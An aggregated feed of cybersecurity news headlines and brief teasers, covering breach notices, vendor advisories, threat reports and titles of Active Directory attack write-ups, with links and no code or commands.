How Phished Data Turns into Apple & Google Wallets
Carding -- the underground business of stealing, selling and swiping stolen payment card data -- has long been the dominion of Russia-based hackers. Happily, the broad deployment of more secure chip-based payment cards in the United States has weakened the carding market. But a flurry of innovation from cybercrime groups in China is breathing new life into the carding industry, by turning phished card data into mobile wallets that can be used online and at main street stores.
https://krebsonsecurity.com/2025/02/how-phished-data-turns-into-apple-google-wallets/

2024 Vulnerability Scanning Surges 91%
Scans intensify, looking for a critical vulnerability in TBK DVR devices.
https://www.f5.com/labs/articles/threat-intelligence/2024-vulnerability-scanning-surges-91

No, you're not fired – but beware of job termination scams
Some employment scams take an unexpected turn as cybercriminals shift from “hiring” to “firing” staff
https://www.welivesecurity.com/en/scams/no-youre-not-fired-beware-job-termination-scams/

Katharine Hayhoe: The most important climate equation | Starmus highlights
The atmospheric scientist makes a compelling case for a head-to-heart-to-hands connection as a catalyst for climate action
https://www.welivesecurity.com/en/we-live-science/katharine-hayhoe-most-important-climate-equation-starmus-highlights/

On Cybersecurity Mentorship
I want to take a moment to articulate my thoughts on cybersecurity mentorship and what it should entail. I speak a lot about problems I see doing extensive mentoring and career clinics, but I have been repeatedly asked for a formal resource on how to conduct mentorships (and find a mentor). First, your mileage may […]
https://tisiphone.net/2025/02/16/on-cybersecurity-mentorship/

A Very Personal Interview with SecurityWeek Magazine
I hope you enjoy my latest interview with SecurityWeek Magazine on my career and the future of OT cybersecurity. https://www.securityweek.com/rising-tides-lesley-carhart-on-bridging-enterprise-security-and-ot-and-improving-the-human-condition/
https://tisiphone.net/2025/02/16/a-very-personal-interview-with-securityweek-magazine/

Storenvy - 11,052,071 breached accounts
In mid-2019, the e-commerce website Storenvy suffered a data breach that exposed millions of customer records. A portion of the breached records were subsequently posted to a hacking forum with cracked password hashes, whilst the entire corpus of 23M rows was put up for sale. The data contained 11M unique email addresses alongside usernames, IP addresses, the user's city, gender, date of birth and original salted SHA-1 password hash.
https://haveibeenpwned.com/PwnedWebsites#Storenvy

4 ways to bring cybersecurity into your community
It’s easy to focus on technology when talking about cybersecurity. However, the best prevention measures rely on the education of those who use technology. Organizations training their employees is the first step. But the industry needs to expand the concept of a culture of cybersecurity and take it from where it currently stands as an […] The post 4 ways to bring cybersecurity into your community appeared first on Security Intelligence.
https://securityintelligence.com/articles/4-ways-to-bring-cybersecurity-into-your-community/

Microsoft .NET Framework Information Disclosure Vulnerability
What is the Attack? Threat actors are targeting a Microsoft .NET Framework information disclosure vulnerability (CVE-2024-29059) that exposes the ObjRef URI to an attacker, ultimately enabling remote code execution. The security vulnerability, tracked as CVE-2024-29059, was also added to CISA's Known Exploited Vulnerabilities (KEV) Catalog on February 4, 2025. What is the recommended Mitigation? FortiGuard recommends that users apply the fix provided by the vendor and follow the instructions in the vendor's advisory. [CVE-2024-29059 - Security Update Guide - Microsoft - .NET Framework Information Disclosure Vulnerability] What FortiGuard Coverage is available? FortiGuard IPS protection is available, and Fortinet customers remain protected through it. Intrusion Prevention | FortiGuard...
https://fortiguard.fortinet.com/threat-signal-report/6014

Nearly a Year Later, Mozilla is Still Promoting OneRep
In mid-March 2024, KrebsOnSecurity revealed that the founder of the personal data removal service Onerep also founded dozens of people-search companies. Shortly after that investigation was published, Mozilla said it would stop bundling Onerep with the Firefox browser and wind down its partnership. But nearly a year later, Mozilla is still promoting it to Firefox users.
https://krebsonsecurity.com/2025/02/nearly-a-year-later-mozilla-is-still-promoting-onerep/

Out with the Old, In with the Bold: Gen Threat Labs
For years, Avast Decoded has been your go-to for the latest in cybersecurity insights and research. But as cybercriminals evolve, so do we. Starting now, our groundbreaking research, expert analysis and the stories that keep the digital world safe are moving to one place: the Gen Insights Blog. By uniting our expertise under the Gen […] The post Out with the Old, In with the Bold: Gen Threat Labs appeared first on Avast Threat Labs.
https://decoded.avast.io/salat/out-with-the-old-in-with-the-bold-gen-threat-labs/?utm_source=rss&utm_medium=rss&utm_campaign=out-with-the-old-in-with-the-bold-gen-threat-labs

How red teaming helps safeguard the infrastructure behind AI models
Artificial intelligence (AI) is now squarely on the frontlines of information security. However, as is often the case when the pace of technological innovation is very rapid, security often ends up being a secondary consideration. This is increasingly evident from the ad-hoc nature of many implementations, where organizations lack a clear strategy for responsible AI […] The post How red teaming helps safeguard the infrastructure behind AI models appeared first on Security Intelligence.
https://securityintelligence.com/articles/how-red-teaming-helps-safeguard-the-infrastructure-behind-ai-models/

Gaming or gambling? Lifting the lid on in-game loot boxes
The virtual treasure chests and other casino-like rewards inside your children's games may pose risks you shouldn't play down
https://www.welivesecurity.com/en/kids-online/gaming-gambling-lifting-lid-in-game-loot-boxes/

Doxbin (TOoDA) - 136,461 breached accounts
In February 2025, the "doxing" website Doxbin was compromised by a group calling themselves "TOoDA" and the data dumped publicly. Included in the breach were 336k unique email addresses alongside usernames. The data was provided to HIBP by a source who requested it be attributed to "emo.rip".
https://haveibeenpwned.com/PwnedWebsites#DoxbinTOoDA

Zacks (2024) - 11,994,223 breached accounts
In June 2024, the investment research company Zacks was allegedly breached, and data was later published to a popular hacking forum. This comes after a separate Zacks data breach confirmed by the organisation in 2023 with the subsequent breach disclosing millions of additional records representing a superset of data from the first incident. The 2024 breach included 12M unique email addresses along with IP and physical addresses, names, usernames, phone numbers and unsalted SHA-256 password hashes. Zacks did not respond to multiple attempts to contact them about the incident.
https://haveibeenpwned.com/PwnedWebsites#Zacks2024

Shadow Credentials Attack
In this post, we explore the exploitation technique known as the Shadow Credentials attack. This attack leverages the mismanagement or exploitation of Active Directory Certificate The post Shadow Credentials Attack appeared first on Hacking Articles.
https://www.hackingarticles.in/shadow-credentials-attack/

How GitHub uses CodeQL to secure GitHub
How GitHub's Product Security Engineering team manages our CodeQL implementation at scale and how you can, too. The post How GitHub uses CodeQL to secure GitHub appeared first on The GitHub Blog.
https://github.blog/engineering/how-github-uses-codeql-to-secure-github/

When you shouldn't patch: Managing your risk factors
Look at any article with advice about best practices for cybersecurity, and about third or fourth on that list, you’ll find something about applying patches and updates quickly and regularly. Patching for known vulnerabilities is about as standard as it gets for good cybersecurity hygiene, right up there with using multi-factor authentication and thinking before […] The post When you shouldn't patch: Managing your risk factors appeared first on Security Intelligence.
https://securityintelligence.com/articles/when-you-shouldnt-patch-managing-your-risk-factors/

What is penetration testing? | Unlocked 403 cybersecurity podcast (ep. 10)
Ever wondered what it's like to hack for a living – legally? Learn about the art and thrill of ethical hacking and how white-hat hackers help organizations tighten up their security.
https://www.welivesecurity.com/en/videos/what-is-penetration-testing-unlocked-403-cybersecurity-podcast-ep-10/

The straight and narrow — How to keep ML and AI training on track
Artificial intelligence (AI) and machine learning (ML) have entered the enterprise environment. According to the IBM AI in Action 2024 Report, two broad groups are onboarding AI: Leaders and learners. Leaders are seeing quantifiable results, with two-thirds reporting 25% (or greater) boosts to revenue growth. Learners, meanwhile, say they’re following an AI roadmap (72%), but […] The post The straight and narrow — How to keep ML and AI training on track appeared first on Security Intelligence.
https://securityintelligence.com/articles/the-straight-and-narrow-how-to-keep-ml-and-ai-training-on-track/

How AI-driven identity fraud is causing havoc
Deepfake fraud, synthetic identities, and AI-powered scams make identity theft harder to detect and prevent – here's how to fight back
https://www.welivesecurity.com/en/cybersecurity/ai-driven-identify-fraud-havoc/

Stealthy AD CS Reconnaissance
Introducing a certipy parse command to perform stealthy offline AD CS enumeration based on local registry data.
https://blog.compass-security.com/2025/02/stealthy-ad-cs-reconnaissance/

Permission escalation due to an Improper Privilege Management
An incorrect privilege assignment vulnerability [CWE-266] in the FortiOS security fabric may allow an authenticated admin whose access profile has the Security Fabric write permission to escalate their privileges to super-admin by connecting the targeted FortiGate to a malicious upstream FortiGate they control. Revised on 2025-03-13 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-302

LandAirSea - 337,373 breached accounts
In January 2025, the GPS tracking service LandAirSea suffered a data breach that exposed 337k unique customer email addresses alongside names, usernames and password hashes. The breach also exposed partial credit card data (card type, last 4 digits and expiration), and GPS device identifiers and locations. LandAirSea is aware of the breach and has remediated the underlying vulnerability. The data was provided to HIBP by a source who requested it be attributed to "zathienaephi@proton.me".
https://haveibeenpwned.com/PwnedWebsites#LandAirSea

Reducing ransomware recovery costs in education
2024 continued the trend of ransomware attacks in the education sector making headlines. The year opened with Freehold Township School District in New Jersey canceling classes due to a ransomware attack. Students at New Mexico Highlands University missed classes for several days while employees experienced disruption of their paychecks after a ransomware attack. The attack on […] The post Reducing ransomware recovery costs in education appeared first on Security Intelligence.
https://securityintelligence.com/articles/reducing-ransomware-recovery-costs-in-education/

Neil Lawrence: What makes us unique in the age of AI | Starmus highlights
As AI advances at a rapid clip, reshaping industries, automating tasks, and redefining what machines can achieve, one question looms large: what remains uniquely human?
https://www.welivesecurity.com/en/we-live-science/neil-lawrence-what-makes-us-unique-age-ai-starmus-highlights/

Adopt Me Trading Values - 86,136 breached accounts
In July 2022, the Adopt Me Trading Values website for assessing the value of pet trades within the "Adopt Me!" Roblox game suffered a data breach that was later redistributed as part of a larger corpus of data. The breach exposed 86k unique email addresses along with usernames (and Roblox usernames), IP addresses and bcrypt password hashes. The data was provided to HIBP by a source who requested it be attributed to "Leidhall".
https://haveibeenpwned.com/PwnedWebsites#AdoptMeTradingValues

Abusing AD Weak Permission Pre2K Compatibility
Pre2K (short for “Pre-Windows 2000”) Active Directory misconfigurations often stem from overlooked legacy settings in Windows environments. Common issues include enabling NTLM or SMBv1 for The post Abusing AD Weak Permission Pre2K Compatibility appeared first on Hacking Articles.
https://www.hackingarticles.in/abusing-ad-weak-permission-pre2k-compatibility/

Trimble Cityworks Remote Code Execution Attack
What is the Attack? Trimble Cityworks contains a deserialization vulnerability. This could allow an authenticated user to perform a remote code execution attack against a customer's Microsoft Internet Information Services (IIS) web server, potentially resulting in downtime and loss of service. According to the Trimble Cityworks website, it provides a Geographic Information System (GIS)-centric solution for local governments, utilities, airports, and public works agencies to manage and maintain infrastructure across the full lifecycle. Trimble has investigated customer reports of hackers exploiting the vulnerability to gain unauthorized access to networks, confirming that active exploitation is occurring. CISA has added CVE-2025-0994 to its Known Exploited Vulnerabilities Catalog on February...
https://fortiguard.fortinet.com/threat-signal-report/5997

Brain Cipher Ransomware Attack
What is the attack? A significant ransomware attack has struck Pusat Data Nasional (PDN), one of Indonesia's government-owned national data centers. This incident involved threat actors encrypting government data, which disrupted digital services for immigration, airport checks, and several public services. This ransomware attack represents a new variant of the LockBit 3.0 ransomware. In 2023, the LockBit hacker group also severely disrupted the Bank Syariah Indonesia (BSI) systems. What is the recommended Mitigation? Ensure that all systems are up to date with robust cybersecurity measures. Also, maintain general awareness and training about the risk of phishing and social engineering attacks in the organization. What FortiGuard Coverage is available? FortiGuard Labs has AV signatures to block...
https://fortiguard.fortinet.com/threat-signal-report/5479

From finding to fixing: GitHub Advanced Security integrates Endor Labs SCA
The partnership between GitHub and Endor Labs enables application security engineers and developers to drastically reduce time spent on open source vulnerabilities, and gives them the tools to go from finding to fixing. The post From finding to fixing: GitHub Advanced Security integrates Endor Labs SCA appeared first on The GitHub Blog.
https://github.blog/security/from-finding-to-fixing-github-advanced-security-integrates-endor-labs-sca/

Will AI threaten the role of human creativity in cyber threat detection?
Cybersecurity requires creativity and thinking outside the box. It’s why more organizations are looking at people with soft skills and coming from outside the tech industry to address the cyber skills gap. As the threat landscape becomes more complex and nation-state actors launch innovative cyberattacks against critical infrastructure, there is a need for cybersecurity professionals […] The post Will AI threaten the role of human creativity in cyber threat detection? appeared first on Security Intelligence.
https://securityintelligence.com/articles/will-ai-threaten-the-role-of-human-creativity-in-cyber-threat-detection/

Hacking the mind: Why psychology matters to cybersecurity
In cybersecurity, too often, the emphasis is placed on advanced technology meant to shield digital infrastructure from external threats. Yet, an equally crucial — and underestimated — factor lies at the heart of all digital interactions: the human mind. Behind every breach is a calculated manipulation, and behind every defense, a strategic response. The psychology […] The post Hacking the mind: Why psychology matters to cybersecurity appeared first on Security Intelligence.
https://securityintelligence.com/articles/hacking-the-mind-why-psychology-matters-to-cybersecurity/

1-15 November 2024 Cyber Attacks Timeline
In the first timeline of November 2024 I collected 128 events with a threat landscape dominated by malware...
https://www.hackmageddon.com/2025/02/06/1-15-november-2024-cyber-attacks-timeline/

Stress-testing multimodal AI applications is a new frontier for red teams
Human communication is multimodal. We receive information in many different ways, allowing our brains to see the world from various angles and turn these different “modes” of information into a consolidated picture of reality. We’ve now reached the point where artificial intelligence (AI) can do the same, at least to a degree. Much like our […] The post Stress-testing multimodal AI applications is a new frontier for red teams appeared first on Security Intelligence.
https://securityintelligence.com/articles/stress-testing-multimodal-ai-applications-new-frontier-for-red-teams/

Cybercriminals Use Go Resty and Node Fetch in 13 Million Password Spraying Attempts

https://www.proofpoint.com/us/newsroom/news/cybercriminals-use-go-resty-and-node-fetch-13-million-password-spraying-attempts

Cybersecurity awareness: Apple's cloud-based AI security system
The rising influence of artificial intelligence (AI) has many organizations scrambling to address the new cybersecurity and data privacy concerns created by the technology, especially as AI is used in cloud systems. Apple addresses AI’s security and privacy issues head-on with its Private Cloud Compute (PCC) system. Apple seems to have solved the problem of […] The post Cybersecurity awareness: Apple’s cloud-based AI security system appeared first on Security Intelligence.
https://securityintelligence.com/articles/cybersecurity-awareness-apples-cloud-based-ai-security-system/

Lazarus Group Targets Organizations with Sophisticated LinkedIn Recruiting Scam
Bitdefender Labs warns of an active campaign by the North Korea-linked Lazarus Group, targeting organizations by capturing credentials and delivering malware through fake LinkedIn job offers. LinkedIn may be a vital tool for job seekers and professionals, but it has also become a playground for cybercriminals exploiting its credibility. From fake job offers and elaborate phishing schemes to scams and even state-sponsored threat actors who prey on people's career aspirations and trust in profess
https://www.bitdefender.com/en-us/blog/labs/lazarus-group-targets-organizations-with-sophisticated-linkedin-recruiting-scam

Patch or perish: How organizations can master vulnerability management
Don't wait for a costly breach to provide a painful reminder of the importance of timely software patching
https://www.welivesecurity.com/en/cybersecurity/patch-perish-organizations-vulnerability-management/

Proofpoint Leaders Named CRN Channel Chiefs 2025

https://www.proofpoint.com/us/newsroom/news/proofpoint-leaders-named-crn-channel-chiefs-2025

How AI-driven SOC co-pilots will change security center operations
Have you ever wished you had an assistant at your security operations centers (SOCs) — especially one who never calls in sick, has a bad day or takes a long lunch? Your wish may come true soon. Not surprisingly, AI-driven SOC “co-pilots” are topping the lists for cybersecurity predictions in 2025, which often describe these […] The post How AI-driven SOC co-pilots will change security center operations appeared first on Security Intelligence.
https://securityintelligence.com/articles/how-ai-driven-soc-co-pilots-will-change-security-center-operations/

Phishing tax scams increase as tax deadlines approach

https://www.proofpoint.com/us/newsroom/news/phishing-tax-scams-increase-tax-deadlines-approach

Analysis of an advanced malicious Chrome extension
Two weeks ago I published an article on 63 malicious Chrome extensions. In most cases I could only identify the extensions as malicious. With large parts of their logic being downloaded from some web servers, it wasn't possible to analyze their functionality in detail. However, for the Download Manager Integration Checklist extension I have all parts of the puzzle now. This article is a technical discussion of its functionality that somebody tried very hard to hide. I was also able to identify a number of related extensions that were missing from my previous article. Update (2025-02-04): An update to Download Manager Integration Checklist extension has been released a day before I published this article, clearly prompted by me asking adindex about this. The update removes the malicious functionality...
https://palant.info/2025/02/03/analysis-of-an-advanced-malicious-chrome-extension/

How scammers are exploiting DeepSeek's rise
As is their wont, cybercriminals waste no time launching attacks that aim to cash in on the frenzy around the latest big thing – plus, what else to know before using DeepSeek
https://www.welivesecurity.com/en/cybersecurity/scammers-exploiting-deepseek-hype/

Atlassian Confluence Remote Code Execution (CVE-2023-22527)
What is the Vulnerability? On Jan 16, 2024, Atlassian released an advisory for a template injection vulnerability in Confluence Data Center and Server that can allow an unauthenticated attacker to remotely execute malicious code on affected versions. This vulnerability is rated with a severity level of 10.0 (Critical). What is the Vendor Solution? Atlassian highly recommends applying the latest version available as listed on their advisory (CVE-2023-22527 - Atlassian Support | Atlassian Documentation). What FortiGuard Coverage is available? FortiGuard Labs has an IPS signature "Atlassian.Confluence.CVE-2023-22527.Remote.Code.Execution" in place for CVE-2023-22527. FortiGuard is seeing active exploitation attempts on this vulnerability.
https://fortiguard.fortinet.com/threat-signal-report/5376

Cleo Multiple File Transfer Vulnerabilities (CVE-2024-50623, CVE-2024-55956)
What is the Vulnerability? The critical flaws allow attackers to exploit unrestricted file uploads and downloads, leading to Remote Code Execution; they affect multiple Cleo products and are being actively exploited in the wild. The vulnerability affects the following Cleo products (versions before and including 5.8.0.21): Cleo Harmony, Cleo VLTrader, Cleo LexiCom. Cleo is a software company focused on Managed File Transfer (MFT) solutions. Its products, Cleo VLTrader, Cleo Harmony, and Cleo LexiCom, facilitate secure file transfers and B2B integration, and streamline data exchange and integration. On December 13, 2024, CISA confirmed that CVE-2024-50623 is being actively exploited, including in ransomware campaigns, and has been added to the Known Exploited Vulnerabilities (KEV) catalog. What is the...
https://fortiguard.fortinet.com/threat-signal-report/5602

Windows Bug Class: Accessing Trapped COM Objects with IDispatch
Posted by James Forshaw, Google Project Zero Object orientated remoting technologies such as DCOM and .NET Remoting make it very easy to develop an object-orientated interface to a service which can cross process and security boundaries. This is because they're designed to support a wide range of objects, not just those implemented in the service, but any other object compatible with being remoted. For example, if you wanted to expose an XML document across the client-server boundary, you could use a pre-existing COM or .NET library and return that object back to the client. By default when the object is returned it's marshaled by reference, which results in the object staying in the out-of-process server. This flexibility has a number of downsides, one of which is the topic of this...
https://googleprojectzero.blogspot.com/2025/01/windows-bug-class-accessing-trapped-com.html

Windows Exploitation Tricks: Trapping Virtual Memory Access (2025 Update)
Posted by James Forshaw, Google Project Zero Back in 2021 I wrote a blog post about various ways you can build a virtual memory access trap primitive on Windows. The goal was to cause a reader or writer of a virtual memory address to halt for a significant (e.g. 1 or more seconds) amount of time, generally for the purpose of exploiting TOCTOU memory access bugs in the kernel. The solutions proposed in the blog post were to either map an SMB file on a remote server, or abuse the Cloud Filter API. This blog isn't going to provide new solutions, instead I wanted to highlight a new feature of Windows 11 24H2 that introduces the ability to abuse the SMB file server directly on the local machine, no remote server required. This change also introduces the ability to locally exploit vulnerabilities...
https://googleprojectzero.blogspot.com/2025/01/windows-exploitation-tricks-trapping.html

This month in security with Tony Anscombe – January 2025 edition
DeepSeek's bursting onto the AI scene, apparent shifts in US cybersecurity policies, and a massive student data breach all signal another eventful year in cybersecurity and data privacy
https://www.welivesecurity.com/en/videos/month-security-tony-anscombe-january-2025-edition/

AD Recon: Kerberos Username Bruteforce
In this post, we explore the exploitation technique known as the Kerberos pre-authentication brute-force attack. This attack takes advantage of Kerberos authentication responses to determine The post AD Recon: Kerberos Username Bruteforce appeared first on Hacking Articles.
https://www.hackingarticles.in/ad-recon-kerberos-username-bruteforce/

Untrustworthy AI: How to deal with data poisoning
You should think twice before trusting your AI assistant, as database poisoning can markedly alter its output – even dangerously so
https://www.welivesecurity.com/en/business-security/untrustworthy-ai-data-poisoning/

How we kept the Google Play & Android app ecosystems safe in 2024
Posted by Bethel Otuteye and Khawaja Shams (Android Security and Privacy Team), and Ron Aquino (Play Trust and Safety) Android and Google Play comprise a vibrant ecosystem with billions of users around the globe and millions of helpful apps. Keeping this ecosystem safe for users and developers remains our top priority. However, like any flourishing ecosystem, it also attracts its share of bad actors. That's why every year, we continue to invest in more ways to protect our community and fight bad actors, so users can trust the apps they download from Google Play and developers can build thriving businesses. Last year, those investments included AI-powered threat detection, stronger privacy policies, supercharged developer tools, new industry-wide alliances, and more. As a result, we...
http://security.googleblog.com/2025/01/how-we-kept-google-play-android-app-ecosystem-safe-2024.html

Cybersecurity researchers: Digital detectives in a connected world
Discover the exciting world of cybersecurity research: what researchers do, essential skills, and actionable steps to begin your journey toward protecting the digital world. The post Cybersecurity researchers: Digital detectives in a connected world appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/cybersecurity-researchers-digital-detectives-in-a-connected-world/

Credential Dumping: AD User Comment
In this article, we shall explore different tools & techniques that help us enumerate Active Directory (AD) users’ passwords using which an attacker can expand The post Credential Dumping: AD User Comment appeared first on Hacking Articles.
https://www.hackingarticles.in/credential-dumping-ad-user-comment/

How we estimate the risk from prompt injection attacks on AI systems
Posted by the Agentic AI Security Team at Google DeepMind. Modern AI systems, like Gemini, are more capable than ever, helping retrieve data and perform actions on behalf of users. However, data from external sources present new security challenges if untrusted sources are available to execute instructions on AI systems. Attackers can take advantage of this by hiding malicious instructions in data that are likely to be retrieved by the AI system, to manipulate its behavior. This type of attack is commonly referred to as an "indirect prompt injection," a term first coined by Kai Greshake and the NVIDIA team. To mitigate the risk posed by this class of attacks, we are actively deploying defenses within our AI systems along with measurement and monitoring tools. One of these tools is a robust evaluation...
http://security.googleblog.com/2025/01/how-we-estimate-risk-from-prompt.html

BloodHound Community Edition Custom Queries
This blog post introduces our new custom queries for BloodHound Community Edition (CE) and explains how you can use them effectively to analyze your Active Directory infrastructure. TL;DR: Check out our new BloodHound CE custom queries! Active Directory and BloodHound The majority of our customers run a Microsoft Active Directory infrastructure, either exclusively on-prem or […]
https://blog.compass-security.com/2025/01/bloodhound-community-edition-custom-queries/

Privacy-Preserving Federated Learning – Future Collaboration and Continued Research
This post is the final blog in a series on privacy-preserving federated learning . The series is a collaboration between NIST and the UK government's Responsible Technology Adoption Unit (RTA), previously known as the Centre for Data Ethics and Innovation. Learn more and read all the posts published to date at NIST's Privacy Engineering Collaboration Space or RTA's blog . Reflections and Wider Considerations This is the final post in the series that began with reflections and learnings from the first US-UK collaboration working with Privacy Enhancing Technologies (PETs). Since the PETs Prize
https://www.nist.gov/blogs/cybersecurity-insights/privacy-preserving-federated-learning-future-collaboration-and

Diamond Ticket Attack: Abusing Kerberos Trust
The Diamond Ticket attack represents a sophisticated escalation in Active Directory (AD) exploitation methods, leveraging intricate flaws in Kerberos authentication and authorization mechanisms. This article The post Diamond Ticket Attack: Abusing Kerberos Trust appeared first on Hacking Articles.
https://www.hackingarticles.in/diamond-ticket-attack-abusing-kerberos-trust/

Issue with AWS Sign-in IAM User Login Flow – Possible Username Enumeration (CVE-2025-0693)
Publication Date: 2025/01/23 1:30 PM PDT We have identified CVE-2025-0693 in the AWS Identity and Access Management (AWS IAM) Sign-in login flow. This issue could allow an actor to enumerate AWS IAM usernames by measuring server response times during login attempts. Variations in those response times could allow an actor to discern whether a submitted AWS IAM username existed in the account. Please note that username information alone is insufficient to authenticate or access any AWS resources. Full authentication, including account identifier, username, password, and multi-factor authentication (if enabled), is required to access an account. Additionally, AWS leverages multiple layers of protection to monitor and respond to potential misuse of our sign-in endpoints. Affected versions:...
https://aws.amazon.com/security/security-bulletins/AWS-2025-002/

Android enhances theft protection with Identity Check and expanded features
Posted by Jianing Sandra Guo, Product Manager, Android, Nataliya Stanetsky, Staff Program Manager, Android Today, people around the world rely on their mobile devices to help them stay connected with friends and family, manage finances, keep track of healthcare information and more – all from their fingertips. But a stolen device in the wrong hands can expose sensitive data, leaving you vulnerable to identity theft, financial fraud and privacy breaches. This is why we recently launched Android theft protection, a comprehensive suite of features designed to protect you and your data at every stage – before, during, and after device theft. As part of our commitment to help you stay safe on Android, we're expanding and enhancing these features to deliver even more robust protection...
http://security.googleblog.com/2025/01/android-theft-protection-identity-check-expanded-features.html

Proofpoint and Ingram Micro Team to Radically Simplify and Accelerate Sales Cycles for Partners

https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-and-ingram-micro-team-radically-simplify-and-accelerate-sales

Attacks on Maven proxy repositories
Learn how specially crafted artifacts can be used to attack Maven repository managers. This post describes PoC exploits that can lead to pre-auth remote code execution and poisoning of the local artifacts in Sonatype Nexus and JFrog Artifactory. The post Attacks on Maven proxy repositories appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/attacks-on-maven-proxy-repositories/

ClamAV 1.4.2 and 1.0.8 security patch versions published
Today, we are publishing the 1.4.2 and 1.0.8 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. The images on Docker Hub may not be immediately available on release day. Continue reading to learn what changed in each version. 1.4.2: ClamAV 1.4.2 is a patch release with the following fixes: CVE-2025-20128: Fixed a possible buffer overflow read bug in the OLE2 file parser that could cause a denial-of-service (DoS) condition. This issue was introduced in version 1.0.0 and affects all currently supported versions. It will be fixed in: 1.4.2 and 1.0.8. Thank you to OSS-Fuzz for identifying this issue. 1.0.8: ClamAV 1.0.8 is a patch release with the following fixes: CVE-2025-20128:...
http://blog.clamav.net/2025/01/clamav-142-and-108-security-patch.html

Continued Scanning for CVE-2023-1389
TP-Link draws the attention of the US Government.
https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389

October 2024 Cyber Attacks Statistics
After the cyber attacks timelines, it's time to publish the statistics for October 2024 where I collected and analyzed 240 events...
https://www.hackmageddon.com/2025/01/21/october-2024-cyber-attacks-statistics/

Malicious extensions circumvent Google's remote code ban
As noted last week I consider it highly problematic that Google for a long time allowed extensions to run code they downloaded from some web server, an approach that Mozilla prohibited long before Google even introduced extensions to their browser. For years this has been an easy way for malicious extensions to hide their functionality. When Google finally changed their mind, it wasn't in form of a policy but rather a technical change introduced with Manifest V3. As with most things about Manifest V3, these changes are meant for well-behaving extensions where they in fact improve security. As readers of this blog probably know, those who want to find loopholes will find them: I've already written about the Honey extension bundling its own JavaScript interpreter and malicious extensions...
https://palant.info/2025/01/20/malicious-extensions-circumvent-googles-remote-code-ban/

OSV-SCALIBR: A library for Software Composition Analysis
Posted by Erik Varga, Vulnerability Management, and Rex Pan, Open Source Security Team. In December 2022, we announced OSV-Scanner, a tool to enable developers to easily scan for vulnerabilities in their open source dependencies. Together with the open source community, we've continued to build this tool, adding remediation features, as well as expanding ecosystem support to 11 programming languages and 20 package manager formats. Today, we're excited to release OSV-SCALIBR (Software Composition Analysis LIBRary), an extensible library for SCA and file system scanning. OSV-SCALIBR combines Google's internal vulnerability management expertise into one scanning library with significant new capabilities such as: SCA for installed packages, standalone binaries, as well as source code; OSes...
http://security.googleblog.com/2025/01/osv-scalibr-library-for-software.html

16-31 October 2024 Cyber Attacks Timeline
In the second timeline of October 2024 I collected 120 events with a threat landscape dominated by malware...
https://www.hackmageddon.com/2025/01/16/16-31-october-2024-cyber-attacks-timeline/

Issue with Amazon WorkSpaces, Amazon AppStream 2.0, and Amazon DCV (CVE-2025-0500 and CVE-2025-0501)
Publication Date: 2025/01/15 10:30AM PST Description: AWS identified two issues in specific versions of native clients for Amazon WorkSpaces, Amazon AppStream 2.0, and Amazon DCV. We have proactively communicated with customers regarding the end of support for these impacted versions. CVE-2025-0500: This issue applies to specific versions of native clients for Amazon WorkSpaces (when running Amazon DCV protocol), Amazon AppStream 2.0, and Amazon DCV, listed below. If leveraged, this issue could allow a bad actor to perform a man-in-the-middle attack, allowing them to access remote WorkSpaces, AppStream, or DCV sessions. We recommend customers upgrade to the versions with the fix to address this issue. Affected versions: Amazon WorkSpaces Windows client 5.20.0 or earlier,...
https://aws.amazon.com/security/security-bulletins/AWS-2025-001/

Hitchhiker's Guide to Managed Security
Over the past few years, we have had the opportunity to conduct several Purple Teaming exercises together with our customers. Particularly after Purple Teaming exercises involving external providers, we often see a mismatch between the customer's expectations and the service provided. This blog post attempts to summarize how to prevent the most prevalent issues with a managed security service as early as possible.
https://blog.compass-security.com/2025/01/hitchhikers-guide-to-managed-security/

Out-of-bounds Write in IPSEC Daemon
An Out-of-bounds Write in the FortiOS IPSEC daemon may allow an unauthenticated attacker to perform a denial of service under certain conditions that are outside the control of the attacker. Revised on 2025-03-13 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-373

Chrome Web Store is a mess
Let's make one thing clear first: I'm not singling out Google's handling of problematic and malicious browser extensions because it is worse than Microsoft's for example. No, Microsoft is probably even worse but I never bothered finding out. That's because Microsoft Edge doesn't matter, its market share is too small. Google Chrome on the other hand is used by around 90% of the users world-wide, and one would expect Google to take their responsibility to protect its users very seriously, right? After all, browser extensions are one selling point of Google Chrome, so certainly Google would make sure they are safe? Unfortunately, my experience reporting numerous malicious or otherwise problematic browser extensions speaks otherwise. Google appears to take the “least effort required”...
https://palant.info/2025/01/13/chrome-web-store-is-a-mess/

BIScience: Collecting browsing history under false pretenses
This is a guest post by a researcher who wants to remain anonymous. You can contact the author via email. Recently, John Tuckner of Secure Annex and Wladimir Palant published great research about how BIScience and its various brands collect user data. This inspired us to publish part of our ongoing research to help the extension ecosystem be safer from bad actors. This post details what BIScience does with the collected data and how their public disclosures are inconsistent with actual practices, based on evidence compiled over several years. [Screenshot of claims on the BIScience website] Contents: Who is BIScience? BIScience collects data from millions of users. BIScience buys data from partner third-party extensions. BIScience receives raw...
https://palant.info/2025/01/13/biscience-collecting-browsing-history-under-false-pretenses/

How to secure your GitHub Actions workflows with CodeQL
In the last few months, we secured 75+ GitHub Actions workflows in open source projects, disclosing 90+ different vulnerabilities. Out of this research we produced new support for workflows in CodeQL, empowering you to secure yours. The post How to secure your GitHub Actions workflows with CodeQL appeared first on The GitHub Blog.
https://github.blog/security/application-security/how-to-secure-your-github-actions-workflows-with-codeql/

The Dangers of DNS Hijacking
How expired domains and improper DNS management can lead to severe security risks like MitM attacks, fraudulent TLS/SSL certifications, and more.
https://www.f5.com/labs/articles/threat-intelligence/the-dangers-of-dns-hijacking

Proofpoint Named a Leader in 2025 Gartner® Magic Quadrant™ for Digital Communications Governance and Archiving Solutions

https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-named-leader-2024-gartner-magic-quadrant-digital-communications

Abusing AD-DACL: AddSelf
In this post, we will explore the exploitation of Discretionary Access Control Lists (DACL) using the AddSelf permission in Active Directory environments. By exploiting this The post Abusing AD-DACL: AddSelf appeared first on Hacking Articles.
https://www.hackingarticles.in/abusing-ad-dacl-addself/

ClamAV 1.4 as Next Long-Term Stable (LTS)
